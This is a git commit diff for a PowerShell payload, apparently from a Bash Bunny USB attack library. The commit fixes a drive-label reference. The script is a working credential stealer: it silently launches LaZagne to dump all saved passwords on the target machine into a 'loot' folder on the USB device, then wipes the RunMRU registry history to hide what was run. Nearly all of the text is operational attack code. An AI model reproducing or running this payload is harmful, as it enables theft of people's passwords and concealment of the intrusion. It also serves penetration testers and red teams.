From f7cf46fd952601f4a5ecfe9cd72510439bb4b89a Mon Sep 17 00:00:00 2001 From: Rafa Guillermo Date: Mon, 30 Sep 2024 20:21:11 +0200 Subject: [PATCH] Update payload.ps1 added missed $drivelabel reference --- .../library/credentials/NoDefenseAgainstLaZagne/payload.ps1 | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1 b/payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1 index c91c6925..92b57df4 100644 --- a/payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1 +++ b/payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1 @@ -2,5 +2,5 @@ $drivelabel = 'BashBunny' $dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber') $filter = 'password_'+ $env:COMPUTERNAME $filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1) -Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt') -Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue \ No newline at end of file +Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt') +Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue